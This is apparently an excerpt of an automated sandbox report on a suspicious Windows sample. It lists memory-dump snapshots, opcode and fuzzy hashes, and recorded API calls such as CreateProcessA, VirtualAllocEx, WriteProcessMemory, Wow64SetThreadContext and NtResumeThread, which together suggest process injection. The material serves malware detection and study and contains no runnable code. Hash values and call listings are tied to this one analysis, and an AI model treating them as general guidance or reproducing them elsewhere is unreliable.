                                                                                    • Opcode ID: 1574d568eb7364ad8512d2f8c849490a1cdd1fc7a914df12505d7eab537a27c7
                                                                                    • Instruction ID: 49f57d39996c00a7db26dd94b6198c6a31a0797a8f0c331ab832dc67f37a6b35
                                                                                    • Opcode Fuzzy Hash: 1574d568eb7364ad8512d2f8c849490a1cdd1fc7a914df12505d7eab537a27c7
                                                                                    • Instruction Fuzzy Hash: 58915E70B1021A8FDF94DB69D8607AEB7F6EF88700F108469C909AB354EB359D41DB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac245022ebe9e4cf2c15b8cb3c67090ca819c2595314290b3cce0873c7c8c587
                                                                                    • Instruction ID: 06bd5ea7f3d742753d650be4a10a0673eee3ec00ca45d5f5250123e75a868096
                                                                                    • Opcode Fuzzy Hash: ac245022ebe9e4cf2c15b8cb3c67090ca819c2595314290b3cce0873c7c8c587
                                                                                    • Instruction Fuzzy Hash: B5610671F002214BDF509B7ED98465EFADBEFC4620B154039D90ADB360DEA6EE0287C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f5ea7ebff8257c2aa96c757c61b9845ea7e85a2cf53d80db496d7ca5abfd9b4
                                                                                    • Instruction ID: 1296f54ec57f1bbeacfa08f247e3d4d6a4785a821f3e4b50d03764508581960e
                                                                                    • Opcode Fuzzy Hash: 8f5ea7ebff8257c2aa96c757c61b9845ea7e85a2cf53d80db496d7ca5abfd9b4
                                                                                    • Instruction Fuzzy Hash: F5914F30E106198BDF64DF68C850B9EB7B1FF89300F20C59AD549FB251DB70AA85CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f231c022d253679b7d88ca6aadc17155aa632e9658e0b9813628d65ad8073284
                                                                                    • Instruction ID: b301db011072526dce676d9ba615b34ebf4b3db8f2439138807f41b4ebf0e42f
                                                                                    • Opcode Fuzzy Hash: f231c022d253679b7d88ca6aadc17155aa632e9658e0b9813628d65ad8073284
                                                                                    • Instruction Fuzzy Hash: 69913C30E106198BDF64DF68C890B9EB7B1FF89300F20C599D549BB241EB71AA85CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737448443.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_185d000_InstallUtil.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737510269.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_186d000_InstallUtil.jbxd
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                    • Instruction ID: 458723b22de6e444eb7497a4647fd9d2d9c365e9b0204127e04055a76019e9b0
                                                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                    • Instruction Fuzzy Hash: BA11DC76504280CFCB02CF44D9C0B56BF62FB84320F24C6A9DC094B657C33AE55ACBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2737510269.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_186d000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                    • Instruction ID: 51c8b97c3c27495d1f12b87baf35f89893b601bc194bb41146e61f68beaaddeb
                                                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                    • Instruction Fuzzy Hash: 5911BE75604284CFCB12CF54D5C0B15FB61FB84314F24C6AAD8898B657C33AD44ACB62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 75c9fa421d4c607f5191ba030fb3a14c5174c53a28d41b049ba1cf6e40718da6
                                                                                    • Instruction ID: 11fbaa6ec687bcb1bf91bba816b47b9950f0450d8264dead0b8b186c3cd41661
                                                                                    • Opcode Fuzzy Hash: 75c9fa421d4c607f5191ba030fb3a14c5174c53a28d41b049ba1cf6e40718da6
                                                                                    • Instruction Fuzzy Hash: B411D0B1D01259AFCB00DF9AD884ADEFBF4FB48310F10812AE918A7340C774AA54CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aea7d72b65bc2f2849a51cd6a7490e7915ce8a566a798de6fc8b1525761a3db7
                                                                                    • Instruction ID: 32005d27dfc4a5876fe07185a3dd320009ce5250779537d2ec9450b7f891bfb2
                                                                                    • Opcode Fuzzy Hash: aea7d72b65bc2f2849a51cd6a7490e7915ce8a566a798de6fc8b1525761a3db7
                                                                                    • Instruction Fuzzy Hash: 0201AD31B101256BDBA0966DA850B1BB2DBDBC9B20F20843EE60ECB380EE61DD0243D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 910c5ddc5056329f93db8274fee30a36c952a07ad1c0b6c448b478cc0a4a9fb6
                                                                                    • Instruction ID: 0073695b375b1bf0793995b6a15831a2544b617d953fd2c03a14a9259975f7e7
                                                                                    • Opcode Fuzzy Hash: 910c5ddc5056329f93db8274fee30a36c952a07ad1c0b6c448b478cc0a4a9fb6
                                                                                    • Instruction Fuzzy Hash: 6701B171B141695BDB94AE68DC207AB7BEADBC8710F44413EDA09D7280EE658C0187D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a62389c0e741082f9a09a0cdda854e0c26054155eb8f5fbf77462cdb30bb1b61
                                                                                    • Instruction ID: 581b5ca182330a72f04cb632ebe7f462d3d688675aa9032aff70b8c3de9ffd2c
                                                                                    • Opcode Fuzzy Hash: a62389c0e741082f9a09a0cdda854e0c26054155eb8f5fbf77462cdb30bb1b61
                                                                                    • Instruction Fuzzy Hash: CC01A435B101122BDBA5972CA450B2F67D7D7CDB20F10883DE60ACB350EE25DD0247D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d75d698d35fd572e858742291ce49c731ebaece52af09a13cd8ac6077d20f8be
                                                                                    • Instruction ID: 0b4d4b09d0ce0601b719b3d1f82f892a44b672c14383dd1939c8595d9be539d1
                                                                                    • Opcode Fuzzy Hash: d75d698d35fd572e858742291ce49c731ebaece52af09a13cd8ac6077d20f8be
                                                                                    • Instruction Fuzzy Hash: 1B014F70B201158FDB959B6CD5A472AB7D6EB89720F10842DE60ECB381DE25EE828791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d61f9987063feb79eb30b2d11ad482d2a84c8ee9c01050e07d01fb39e63ab187
                                                                                    • Instruction ID: 1d7ba64b17958063ead38fb43371ad9d222e661fecd0f34dab24dc543452b5b8
                                                                                    • Opcode Fuzzy Hash: d61f9987063feb79eb30b2d11ad482d2a84c8ee9c01050e07d01fb39e63ab187
                                                                                    • Instruction Fuzzy Hash: AE018630B201145BDB909A6CD46472FB7DAEB89720F108428E60EC7340DE25EE428791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68756677e4eefddc8a85fcea1437ea0732191aed61fa7be34d3bf61905be004c
                                                                                    • Instruction ID: 3fcbe553eca117fb89d7c6d26812d4d071f18587e3ebbda4ca2ac4592d0ca993
                                                                                    • Opcode Fuzzy Hash: 68756677e4eefddc8a85fcea1437ea0732191aed61fa7be34d3bf61905be004c
                                                                                    • Instruction Fuzzy Hash: 5D01A931F202285BDF94DA69F85069AB7B5F785750F00853EE901EB340DB31AD0487C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f5db017bc8fb3a20343c6f81dfa24a8ab4ed715e67470118186affa2535d92d
                                                                                    • Instruction ID: 544f87cd1c69341372e274bd5cc5e21aebf2e91f28378c76702e7c8d58373912
                                                                                    • Opcode Fuzzy Hash: 2f5db017bc8fb3a20343c6f81dfa24a8ab4ed715e67470118186affa2535d92d
                                                                                    • Instruction Fuzzy Hash: 84F0FF35B21201CFDFE48B49E9902BCB7B5EB80310F14416ACA05CB261C735DE09CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2744342735.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6cf0000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ed66891a4bb79c88b11607276202c54201970b07190a58b607bdf1a1dc435fc9
                                                                                    • Instruction ID: 26ce12e1bf89286e3453f9c2d50a003204ab1a9e36a3dfd77f26f3b655b0dc95
                                                                                    • Opcode Fuzzy Hash: ed66891a4bb79c88b11607276202c54201970b07190a58b607bdf1a1dc435fc9
                                                                                    • Instruction Fuzzy Hash: 56E08071D24149ABDFD0DF71C90575A77FDE701304F61896CD645E7202E276CA019780

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.3%
                                                                                    Dynamic/Decrypted Code Coverage:97.7%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:262
                                                                                    Total number of Limit Nodes:16

                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B9EEF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0

                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B9EEF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 05B80AD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 05B80AD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0227B61E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2831922422.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2270000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B9FAAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: e85ebcd9a45dc6281ad49a9ddad3b20663c5a049df79ab9d236338670b98aaa6
                                                                                    • Instruction ID: e018ec77f5ef96154556feefba6a78ae3e2016b2276f07365ff2b467dda92693
                                                                                    • Opcode Fuzzy Hash: e85ebcd9a45dc6281ad49a9ddad3b20663c5a049df79ab9d236338670b98aaa6
                                                                                    • Instruction Fuzzy Hash: BC811571D1021A9FDF15CFA9C8857AEBBF2FB48320F148569E855E7250EB74A8818F81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B9FAAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: f82319f15506dcf95af43f5b503d7de6d5e581ae7f1ff3328f9ddf9063c937f2
                                                                                    • Instruction ID: f7ec302b3f4f32dbe07207da6e8ee7e070051f2668d2a92b1e61a12f698d9db9
                                                                                    • Opcode Fuzzy Hash: f82319f15506dcf95af43f5b503d7de6d5e581ae7f1ff3328f9ddf9063c937f2
                                                                                    • Instruction Fuzzy Hash: 2D812471D0031A9FDF15CFA9C8857AEBBF2FF48320F148569E855E7250EB74A8818B81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: ad659edc1efc8f4ad1131856d4b0d4f07d50a8241ac169795135495aa3b56aed
                                                                                    • Instruction ID: 2b5ae3a193eafa202238b7ed2d68dc32a44cf24813b51a997c2e86c0ec1f4b34
                                                                                    • Opcode Fuzzy Hash: ad659edc1efc8f4ad1131856d4b0d4f07d50a8241ac169795135495aa3b56aed
                                                                                    • Instruction Fuzzy Hash: BFD14734700606CFC768DF28C58496EB7F2FF89714B168A69D95ACB661DB30F846CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05B80480
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: ed6b24409358e709e51f1342eb42b95a5aa9182ea2c54ac727465c35ff630e78
                                                                                    • Instruction ID: 593c2662b43f314132c8ee123f8f2133d381b333c68964abd9ab638a085482ca
                                                                                    • Opcode Fuzzy Hash: ed6b24409358e709e51f1342eb42b95a5aa9182ea2c54ac727465c35ff630e78
                                                                                    • Instruction Fuzzy Hash: D92128719003499FDB10DFA9C8857EEBBF1FF48314F14842AE559A7240C7789554DB60

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05B80480
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: acc0ad60ea198e63e958dc1fa01415809590945595a557ca109055a556692899
                                                                                    • Instruction ID: 7688f1898e2dc33c8d5af86b07c27293f7e9388aae816ca9b764aaedc493acbf
                                                                                    • Opcode Fuzzy Hash: acc0ad60ea198e63e958dc1fa01415809590945595a557ca109055a556692899
                                                                                    • Instruction Fuzzy Hash: C02126719003099FDB10DFAAC885BEEBBF5FF48310F14842AE959A7240C779A954DBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0227DC6E,?,?,?,?,?), ref: 0227DD2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2831922422.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2270000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: c0c0b8bbb06d589262b52e759c2b3130262a8d044d61e6196fae1808b65f1bc7
                                                                                    • Instruction ID: 46d5605aeff970174c615d5f24653e91037502c680cc56e701bd2c5397958c38
                                                                                    • Opcode Fuzzy Hash: c0c0b8bbb06d589262b52e759c2b3130262a8d044d61e6196fae1808b65f1bc7
                                                                                    • Instruction Fuzzy Hash: AB21E4B59103099FDB10CFAAD984ADEBBF8FF48310F14841AE914A7350D374A950CFA4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069BDB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 54b8332c9057f581acd8ac764702432e17e47e954eebe44368103857ea54180d
                                                                                    • Instruction ID: 9910b060b41c478ad01e011dcc23995cbe6c93016ec165bf15e7ab6221d77255
                                                                                    • Opcode Fuzzy Hash: 54b8332c9057f581acd8ac764702432e17e47e954eebe44368103857ea54180d
                                                                                    • Instruction Fuzzy Hash: 022107758003099FDB10DFAAC845BEEBBF5AF88320F14842AD459A7640C7799945DFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CEFD4E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2854174725.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6cd0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: cd9230874c2b2b44120cdb394885fe516d5a31e261709e856aff0b6270110052
                                                                                    • Instruction ID: 79e75b89f257b48782ea6f7e9e63c1017064f267bbc99486f4038482604ae8a7
                                                                                    • Opcode Fuzzy Hash: cd9230874c2b2b44120cdb394885fe516d5a31e261709e856aff0b6270110052
                                                                                    • Instruction Fuzzy Hash: B7212975D003098FDB10DFAAC4857EEBBF4EF88214F14842ED559A7240DB789A45CFA4
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069BDB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: e3bd1682b877b8facddae71a4742bd39f3f648a2c63d8b69665fa7fe58aace43
                                                                                    • Instruction ID: 20f7bdf626e0116805317fc525be235655f7c49d1817bd4f4d1cba26edad4aad
                                                                                    • Opcode Fuzzy Hash: e3bd1682b877b8facddae71a4742bd39f3f648a2c63d8b69665fa7fe58aace43
                                                                                    • Instruction Fuzzy Hash: 352115718003098FDB10DFAAC845BEEBBF5EF88320F14842AD459A7240CB799945DFA0
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06A7D8EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2854065027.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6a70000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 96a8dad34426d38b60b432a5958f61fcac6169ae20690408f183d0f597923c6b
                                                                                    • Instruction ID: 842aaf96399ea96749f2858fb9bc90bfcbe99819382bd31624a3707c5ac1adee
                                                                                    • Opcode Fuzzy Hash: 96a8dad34426d38b60b432a5958f61fcac6169ae20690408f183d0f597923c6b
                                                                                    • Instruction Fuzzy Hash: 0B11F4B1D003099FDB10EFAAC885B9EFBF5AF88620F14842AD419A7240C7759945CFA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: b5a8b701db6db1db8e94d5cd1da7496b4d727330379639c3dc3b0c7c4c4c17d6
                                                                                    • Instruction ID: d065535438e16aba880c0b913791e76562dd64ab2a70a15515fcb7806c437361
                                                                                    • Opcode Fuzzy Hash: b5a8b701db6db1db8e94d5cd1da7496b4d727330379639c3dc3b0c7c4c4c17d6
                                                                                    • Instruction Fuzzy Hash: C11149719003498FDB10DFAAC8457EEFBF9AF88620F14841AD555A7240CB799944CFA4
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: bd9cbb39a08578e04a31914a10dd54c51ee76af1f5962f3002899382c48db3e6
                                                                                    • Instruction ID: 6c1e9da6d9465e513fda773ba45d968f4cb598a234c0d9ec1288fa952b8a416c
                                                                                    • Opcode Fuzzy Hash: bd9cbb39a08578e04a31914a10dd54c51ee76af1f5962f3002899382c48db3e6
                                                                                    • Instruction Fuzzy Hash: 71115BB5D003098FDB10DFAAC9847EEFBF5AF88320F14881AD455A7640CB799945CFA4
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B801C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 827545d5f3a7bbc04ca4acf2373c2d15062db3a90348c594bd3930907501a78f
                                                                                    • Instruction ID: b640ce58fd436acc7942c0e35c0c7c35e523da65b15f955f49098c71f497750d
                                                                                    • Opcode Fuzzy Hash: 827545d5f3a7bbc04ca4acf2373c2d15062db3a90348c594bd3930907501a78f
                                                                                    • Instruction Fuzzy Hash: 8511377180034D9FDB10EFAAC845BEEBBF5EF88720F248819E519A7250C775A554DFA0
                                                                                    APIs
